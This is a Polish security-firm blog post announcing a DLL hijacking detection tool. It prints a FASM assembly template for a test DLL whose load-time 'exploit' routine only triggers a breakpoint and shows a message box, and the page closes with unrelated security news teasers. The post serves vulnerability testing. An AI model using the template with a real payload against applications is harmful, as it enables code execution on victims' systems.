Sniffdll: testowanie podatności DLL hijacking

2010-09-07 14:43

Klienci AVET INS korzystający z monitoringu otrzymali wcześniej narzędzie sniffdll wspomagające proces wykrywania podatności typu DLL hijacking w systemach Windows. Narzędzie to zostanie udostępnione publicznie za 14 dni.

Poniżej publikujemy przykładowy szkielet biblioteki DLL z jakiej korzystamy podczas testowania aplikacji pod kątem tej klasy podatności:

format PE DLL

entry DllEntryPoint



include 'win32ax.inc'



section '.text' code readable executable



proc DllEntryPoint hinstDLL,fdwReason,lpvReserved



        cmp [fdwReason], DLL_PROCESS_ATTACH

        je pattach

        cmp [fdwReason], DLL_PROCESS_DETACH

        je pdetach

        cmp [fdwReason], DLL_THREAD_ATTACH

        je tattach

        cmp [fdwReason], DLL_THREAD_DETACH

        je tdetach



exit:

        mov     eax,TRUE

        ret



pattach:

        call exploit

pdetach:

tattach:

tdetach:

        jmp exit

endp



proc exploit

     mov edi, edi       ;simulate hotpatching entry



     nop                ;make space/call for the debugger or

     int 3              ;detour if not using mov edi, edi for it

     nop



     invoke  MessageBox,NULL,'DLL Hijacker: exploit', 'Exploited',MB_ICONERROR+MB_OK

     ret

endp





section '.idata' import data readable writeable



        library kernel,'KERNEL32.DLL',

                user,'USER32.DLL'



        import user,

               MessageBox,'MessageBoxA'

Powyższy kod został napisany przy użyciu asemblera FASM. Kod pochodzi z naszego frameworku do testowania aplikacji. Szablon jak powyższy jest używany do generowania w locie różnych bibliotek np. do ataków typu dll injection. Dzięki użyciu asemblera wynikowe biblioteki są małe.

Blog

MS SQL Server 2005 Extended Support kończy się 12 kwietnia

Rozszerzone wsparcie dla serwera Microsoft SQL Server 2005 kończy się 12 kwietnia. To ostatni moment aby dokonać migracji do wyższej wersji.

Jeśli tego nie zrobiłeś to AVET INS może wesprzeć ...

2016-03-01 09:00, Czytaj więcej Więcej
Kiedy Flash wyginie?

Flash to jedna z tych technologii, która ma bardzo złą – i w tym wypadku całkowicie zasłużenie – reputację w obszarze bezpieczeństwa. Ta reputacja jest tak zła, że od jakiegoś czasu część ...

2016-02-11 16:45, Czytaj więcej Więcej
Krytyczna podatność w kliencie OpenSSH (CVE-2016-0777, CVE-2016-0778)

Wersje oprogramowania klienckiego OpenSSH w wersjach od 5.4 do 7.1 podatne są na atak umożliwiający wyciek pamięci oraz kradzież kluczy prywatnych. W przypadku, gdy połączenie SSH zostanie przerwane ...

2016-02-01 09:30, Czytaj więcej Więcej
Microsoft ogranicza wsparcie IE tylko do wersji 11

Microsoft przestaje wspierać starsze wersje przeglądarki Internet Explorer. Jedyną wspieraną wersją od dzisiaj jest IE 11 i wyższe. Dla wielu systemów (np. Windows 7) może to oznaczać potrzebę aktualizacji lub ...

2016-01-13 09:00, Czytaj więcej Więcej
SafeNet Day: Szyfrowanie w chmurze - prezentacja

Prezentacja Aleksandra Czarnowskiego z konferencji SafeNet Day na temat Szyfrowanie w chmurze jest już dostępna do pobrania. Zapraszamy do pobrania poniżej:

http://www.avet.com.pl/media/pdf/2015-11-02_Szyfrowanie_w_chmurze.pdf

2015-10-31 10:00, Czytaj więcej Więcej